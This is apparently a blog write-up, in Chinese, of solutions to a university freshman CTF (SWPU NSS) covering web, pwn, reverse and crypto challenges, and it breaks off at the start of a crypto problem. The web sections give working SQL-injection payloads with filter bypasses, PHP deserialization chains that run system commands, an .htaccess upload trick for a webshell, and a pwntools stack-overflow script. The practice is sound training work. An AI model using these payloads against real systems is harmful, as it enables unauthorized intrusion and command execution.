SWPU--NSS新生賽 | 风尘孤狼

风尘孤狼

知识型学习记录

0%

SWPU--NSS新生賽

发表于 更新于 分类于 阅读次数: Valine:
本文字数: 27k 阅读时长 ≈ 24 分钟

img

WEB

funny_web

image-20221027110147562

image-20221027110208298

用户名是NSS

image-20221027110219306

比赛群管理员qq都试试,然后就登进去了

image-20221027110326585

直接get传参12345a即可

image-20221027110350979

NSSCTF{bf02b63e-4021-4a40-905c-d514214f4108}

where_am_i

image-20221027110454583

社工,找这个图片的地方的联系方式,百度识图

image-20221027110603911

锦江区的山水间古迹酒店

image-20221027110745248

028-86112888

image-20221027110814880

NSSCTF{094b48ac-f4cd-468a-898c-59211144a279}

奇妙的MD5

原题改编

(62条消息) 【CTF】关于md5总结_吃_早餐的博客-CSDN博客_ctf md5

ez_ez_php

image-20220929184814966

直接文件包含

image-20220929184840317

得到

6' <?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");

echo   "NSSCTF{flag_is_not_here}" ."<br/>";
echo "real_flag_is_in_ '/flag' "."<br/>";
echo "换个思路,试试PHP伪协议呢";

image-20220929184859668

解码得到flag

NSSCTF{332471fd-76b3-4793-b2f6-fb3b5fc59cc6}

ez_sql

image-20220929184951609

Post传参

image-20220929185000600

MariaDB注入

SWPU2019]Web1 sql注入 MariaDB注入–无列名注入-group_concat ---- /**/—group by ----- 3.9修改_Zero_Adam的博客-CSDN博客_mariadb注入

image-20220929185023453

一直到nss=1’//group//by/**/3,'2

image-20220929185032598

所以是三行

nss=1'/**/%26%26/**/updatexml(1,concat(0x7e,(select/**/substr(group_concat(Secr3t),30,20)/**/from/**/NSS_tb),0x7e),1)%23

image-20221027170544656

报错注入,爆表名

nss=0'ununionion/**/select/**/1,2,group_concat(table_name)/**/from/**/infoorrmation_schema.tables/**/where/**/table_schema=database()%23

image-20221027170951576

爆列名

nss=0'ununionion/**/select/**/1,2,group_concat(column_name)/**/from/**/infoorrmation_schema.columns/**/where/**/table_schema=database()%23

image-20221027171056264

nss=0'ununionion/**/select/**/1,2,group_concat(Secr3t,flll444g)/**/from/**/NSS_tb%23

image-20221027171140664

NSSCTF{a60ab5a1-df93-457e-bb58-847111d853b8}

ez_1zpop

小心被刺

题目如下

<?php
error_reporting(0);
class dxg
{
   function fmm()
   {
      return "nonono";
   }
}

class lt
{
   public $impo='hi';
   public $md51='weclome';
   public $md52='to NSS';
   function __construct()
   {
      $this->impo = new dxg;
   }
   function __wakeup()
   {
      $this->impo = new dxg;
      return $this->impo->fmm();
   }

   function __toString()
   {
      if (isset($this->impo) && md5($this->md51) == md5($this->md52) && $this->md51 != $this->md52)
         return $this->impo->fmm();
   }
   function __destruct()
   {
      echo $this;
   }
}

class fin
{
   public $a;
   public $url = 'https://www.ctfer.vip';
   public $title;
   function fmm()
   {
      $b = $this->a;
      $b($this->title);
   }
}

if (isset($_GET['NSS'])) {
   $Data = unserialize($_GET['NSS']);
} else {
   highlight_file(__file__);
}

pop链条构造

<?php

class lt
{
   public $impo;
   public $md51='QNKCDZO';
   public $md52='240610708';
}

class fin
{
   public $a='system';
   public $title='cat /flag';

}

$h1 = new lt();
$h2 = new lt();
$fin = new fin();


$h1->impo=$fin;
echo serialize($h1);

wake绕一下

O:2:"lt":3:{s:4:"impo";O:3:"fin":2:{s:1:"a";s:6:"system";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:7:"QNKCDZO";s:4:"md52";s:9:"240610708";}
O:2:"lt":4:{s:4:"impo";O:3:"fin":2:{s:1:"a";s:6:"system";s:5:"title";s:9:"cat /flag";}s:4:"md51";s:7:"QNKCDZO";s:4:"md52";s:9:"240610708";}

image-20221027174832991

NSSCTF{c34c5909-45ed-4d1d-b952-4e7deeda8303}

1z_unserialize

基础反序列化

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt;
    public $lly;
     
     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }
    
    
}
unserialize($_POST['nss']);
highlight_file(__FILE__);
 
 
?>

执行函数即可

<?php
 
class lyh{
    public $url = 'NSSCTF.com';
    public $lt='system';
    public $lly='cat /flag';
     
     function  __destruct()
     {
        $a = $this->lt;

        $a($this->lly);
     }
    
    
}
$h = new lyh();
echo serialize($h);
 
 
?>
O:3:"lyh":3:{s:3:"url";s:10:"NSSCTF.com";s:2:"lt";s:6:"system";s:3:"lly";s:9:"cat /flag";}

NSSCTF{d47de8b5-018d-4f6e-8158-b4df1f552db9}

webdog1__start

image-20220929185047647

扫目录

image-20220929185056401

Robots.txt

image-20220929185108975

访问f14g.php

image-20220929185121386

看源码

image-20221027111018620

md5绕过,科学计数法即可

image-20221027111249663

0e215962017

image-20221027111401779

这个前面扫目录也看到了是robots.txt

访问f14g.php

抓包得到hint

image-20221027111529602

访问F1l1l1l1l1lag.php得到

image-20221027111610034

image-20221027111747960

读取的话进行了过滤,使用编码的tab绕过

image-20221027112237938

image-20221027112309393

NSSCTF{c1a46c1f-b61e-41ca-a90e-b7c80ca82da9}

Ez_upload

简单的文件上传

image-20221027112403352

fuzz发现支持图片上传,好像也过滤了一些字符

基本思路就是先上传编码马然后上传.htaccess文件对应上传的编码马,这个时候发现是只能上传jpg图片

image-20221027113103170

前端绕过上传配置文件

image-20221027113443051

<FilesMatch "2.jpg">
 SetHandler application/x-httpd-php
php://filter/convert.base64-decode/resource=/var/www/html/upload/1654f692bf439e0c78420bde48dca5b0/2.jpg
</FilesMatch>

然后访问传的马就可以看到flag了

numgame

image-20221027113735049

发现源代码看不了,自己加前缀view-source:

image-20221027113847419

进js文件

image-20221027113904792

解码得到NsScTf.php,继续访问

image-20221027113946561

调用类的静态方法的方法,类名::方法名

使用php对类名方法名大小写不敏感进行绕过关键词

image-20221027114120752

image-20221027114132958

NSSCTF{b06953ef-afd1-47d8-8930-6745f0d2544e}

ez_rce

打开界面是这样

image-20220929185159277

Dirsearch扫一下

image-20220929185208385

查看robots.txt

image-20220929185218972

image-20220929185225329

好家伙,tp5.0,找cve

image-20220929185238454

image-20220929185245442

(62条消息) thinkphp漏洞复现_YouthBelief的博客-CSDN博客_thinkphp漏洞复现

不能直接cat,那就写入shell,也写不进去(这地方不是不能cat,是那个/flag就没有内容)

Find一下找找

image-20220929185259068

找到flag

image-20220929185308179

NSSCTF{c8442f7f-ca60-48e8-b321-88e5dcb76df9}

Xff

image-20220929185329000

先是xff本地

image-20220929185339723

然后加referer本地,得到flag

image-20220929185349593

Flag: NSSCTF{th1s_xff_1s_e4ay}

js_sign

真的只是js吗

image-20221027181049097

找到main.js

image-20221027181137652

document.getElementsByTagName("button")[0].addEventListener("click", ()=>{
    flag="33 43 43 13 44 21 54 34 45 21 24 33 14 21 31 11 22 12 54 44 11 35 13 34 14 15"
    if (btoa(flag.value) == 'dGFwY29kZQ==') {
        alert("you got hint!!!");
    } else {
        alert("fuck off !!");
    }    
})

输出tap code解码得到flag

NSSCTF{youfindflagbytapcode}

ez_ez_unserialize

题目如下

<?php
class X
{
    public $x = __FILE__;
    function __construct($x)
    {
        $this->x = $x;
    }
    function __wakeup()
    {
        if ($this->x !== __FILE__) {
            $this->x = __FILE__;
        }
    }
    function __destruct()
    {
        highlight_file($this->x);
        //flag is in fllllllag.php
    }
}
if (isset($_REQUEST['x'])) {
    @unserialize($_REQUEST['x']);
} else {
    highlight_file(__FILE__);
}

exp如下

<?php
class X
{
    public $x ='fllllllag.php';
    
}

$h = new X();
$flag = serialize($h);
echo $flag;
//O:1:"X":1:{s:1:"x";s:13:"fllllllag.php";}

image-20221028180726334

NSSCTF{722389cb-4e74-4b0c-b884-7d07ffc32d4b}

后面三道不想写了(其实是我太菜了)

PWN

Does your nc work?

顾名思义

NSSCTF{fcecd94b-a330-4118-9fde-b40bdcd9243a}

有手就行的栈溢出

基础栈溢出

from pwn import *

p = remote('1.14.71.254',28367)

#p = process('./pwn')

payload = b'a'*40+p64(0x401257)

p.sendline(payload)

p.interactive()

image-20220929185436897

NSSCTF{04eda8d6-e5ae-4ffc-b037-75458bddafba}

RE

Babyre

Ida打开就能看到

NSSCTF{this_is_the_first_flag}

Easyre

同上

NSSCTF{oh_you_find_it}

Xor

image-20220929185503782

image-20220929185517877

异或运算加密/解密 - 一个工具箱 - 好用的在线工具都在这里! (atoolbox.net)

NSSCTF{XOR_1s_good_way_to_encrypt_flag}

base64

base64解码得到NSSCTF{base_64_NTWQ4ZGDNC7N}

base64-2

还是base64,只不过换码表了

import base64

table="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="

table_changed="NOPQRSTUVWXYZABCDEFGHIJKLMnopqrstuvwxyzabcdefghijklm0123456789+/"

s='GyAGD1ETr3AcGKNkZ19PLKAyAwEsAIELHx1nFSH2IwyGsD=='

res=""

for c in s:

  res+=table[table_changed.find(c)]   

print(base64.b64decode(res))

NSSCTF{siMp13_Base64_5TXRMZHU6V9S}

Upx

Upx壳,脱壳后

image-20220929185603136

异或加密,解密得到flag

NSSCTF{UPX_1s_xord_way_to_encrypt_flag}

贪吃蛇

image-20220929185617672

NSSCTF{YourAreTheMasterOfGame!}

Crypto

yafu分解

题目如下

from gmpy2 import invert
from Crypto.Util.number import getPrime, bytes_to_long
from flag import getflag

e = 65537
p = getPrime(140)
q = getPrime(140)
n = p * q
phiN = (p - 1) * (q - 1)
d = invert(e, phiN)
m = bytes_to_long(getflag().encode())
c = pow(m, e, n)
print("n=" + str(n))
print("c=" + str(c))
#n=1851012829537540993346897265450988006921329733937556249710137670254755668838970157221
#c=1165608868963663237838494928147497339359377331987999335624507621030816298293537918937

知道n,c,e

yafu爆破得到p,q

image-20221023162524973

P43 = 1358730637766188714476624560503309609820513
P43 = 1362310363870711901033415700690289289304517

脚本一把梭

import libnum
from Crypto.Util.number import long_to_bytes
 
n=1851012829537540993346897265450988006921329733937556249710137670254755668838970157221
c=1165608868963663237838494928147497339359377331987999335624507621030816298293537918937

#n = int("",16)
e = 65537
#e = int("",16)

p = 1358730637766188714476624560503309609820513
q = 1362310363870711901033415700690289289304517


 
d = libnum.invmod(e, (p - 1) * (q - 1))
m = pow(c, d, n)  
string = long_to_bytes(m) 
print(string)  
//b'AFFPGS{snzv1l_ov9_gur_g0_Jr1p0zr}'

rot13解码得到flag

NSSCTF{fami1y_bi9_the_t0_We1c0me}

Welcome to Modern Cryptography

rsa,在线网站直接解了

RSA加密、RSA解密 - 在线工具 - OKTools

image-20221023163203284

NSSCTF{9b28603c-1d61-4a51-9e37-dfb939bd0e81}

善哉善哉

善斋善哉,出题人以慈悲为怀

image-20221028181845802

打开看看在最后找到了摩斯

--..-.--.--..../-..----.-.--.--/--..--.----..../--------...--.-./-...-.-.-----.../-..-.--.-.---.../-.-....---..---/-..-.--..-..--.-/-..-.-.--.-..--./-.-.-....----.-/-...-.-.-----.../-..-.-.--.-..--./-..-.--..-....../--..-...--.-..-/-..-.--.-.---.../-.-....---..---/-------..----.-/-....-.--.-.-..-/-..-.-.--.-..--./-.-.--.-.-..-../-..-.--..-..--.-/--..-.--.-.----/-.-.-..-.-..-../-..--.......-.../-..-.-.--.-..--./-.....-..---..-./-.-.--....--.-./-.-.--......---/-.-..-------.--/-..-.-.--.-..--./-.--..-..--.---/-.-.-.--.....--/-.-.-..--...--./-.-.--.-.--.-../-.-.-....--.--./-.....-----.-..-/-.....-.---..-.-/-.-.--......---/-.........-.-.../-.-.-..-..-..-./-..-.-.--.-..--./--....-....--.-/-..-.-.--.-..--./-.-.--.--..-..-/-.........-.-.../--...-..-....../-.-.--.-.-..-../-..-.-.--.-..--./-.-.--......---/-..-.-.--.-..--./-..-.--..-..--.-/-..-.--..-....../-.-..-------.--/--------....-.-/-.--.---.-...--/-.-.-....----.-/---.---..-----./-..-.--...------/--....-....--.-/-.....-----.-..-/-..-------.---./-.-------....--/-..-.--..-..--.-/-.-..-------.--/-..-.--..-....../-.-.--.-.-..-../-.-.-....----.-/-....---...---../-.-.-....--.--./--..-.--.-.----/-..-.-.--.-..--./-.-.--....--.-./--....-....--.-/-.-.-....----.-/-.....-.---..-.-/-.--.---.-...--/-.-.-..--...--./-.....-..---..-./-.--....-.----./-.-.--.--..-..-/-..----....----/-.-.--......---/--....-....--.-/-..-.--..-..--.-/-.-.--......---/-.-.-....----.-/-..-.-.---..--.-/-.-...-.-.---../-.-.-.--.----../-.--..--.....-.

解码得到

新 佛 曰 : 諸 隸 僧 降 閦 吽 諸 閦 陀 摩 隸 僧 缽 薩 閦 嚤 降 斯 咤 須 閦 色 嘚 嘇 叻 閦 夷 喃 哆 嚴 吶 菩 若 嘇 耨 咒 閦 愍 閦 囉 耨 所 嚤 閦 嘇 閦 降 陀 叻 羅 宣 吽 眾 阿 愍 菩 修 心 降 叻 陀 嚤 吽 蜜 吶 斯 閦 嘚 愍 吽 若 宣 哆 色 塞 囉 伏 嘇 愍 降 嘇 吽 闍 兜 喼 如

新与佛论禅

image-20221028182059471

在图片属性找到线索

image-20221028182127626

得到flag

NSSCTF{7551772a99379ed0ae6015a470c1e335}

什锦

附件给了一个图片两个文本

image-20221028182344345

猪圈密码

brainfuck解密

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>>>>>>>>++++++++++<<<<<<<<-]++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>>>++++++++++>++++++++++<<<<-]>>>++>++<<<<++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>>++++++++++<<-]>>-<<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>>>>>++++++++++>++++++++++<<<<<<-]>>>>>->-<<<<<<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>>>>>>>++++++++++<<<<<<<-]>>>>>>>---<<<<<<<+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++[>++++++++++<-]>++++<+[>>>>>>>>>++++++++++<<<<<<<<<-]>[.>]

还有个核心价值观解密

CodeA=Decode(友善爱国平等友善自由友善敬业爱国诚信文明诚信自由平等友善平等友善公正诚信民主友善自由友善爱国公正敬业爱国爱国诚信自由友善爱国自由诚信民主爱国诚信民主友善平等友善爱国公正敬业公正爱国法治友善爱国公正敬业爱国爱国诚信自由诚信自由平等敬业文明爱国诚信文明诚信自由爱国诚信民主富强敬业富强)
CodeB=Decode(CodeB.png)
CodeC=Decode(CodeC.txt)
flag=MD5(CodeA+CodeB+CodeC)

最终解的如下

富强明主文明和谐
pigissocutewhyyoukillpig
但是猪猪好好吃诶

md5加密后得到flag

NSSCTF{c05485d678cb8a6beb401f31d762532a}

小明文

题目如下

from gmpy2 import invert
from Crypto.Util.number import getPrime, bytes_to_long
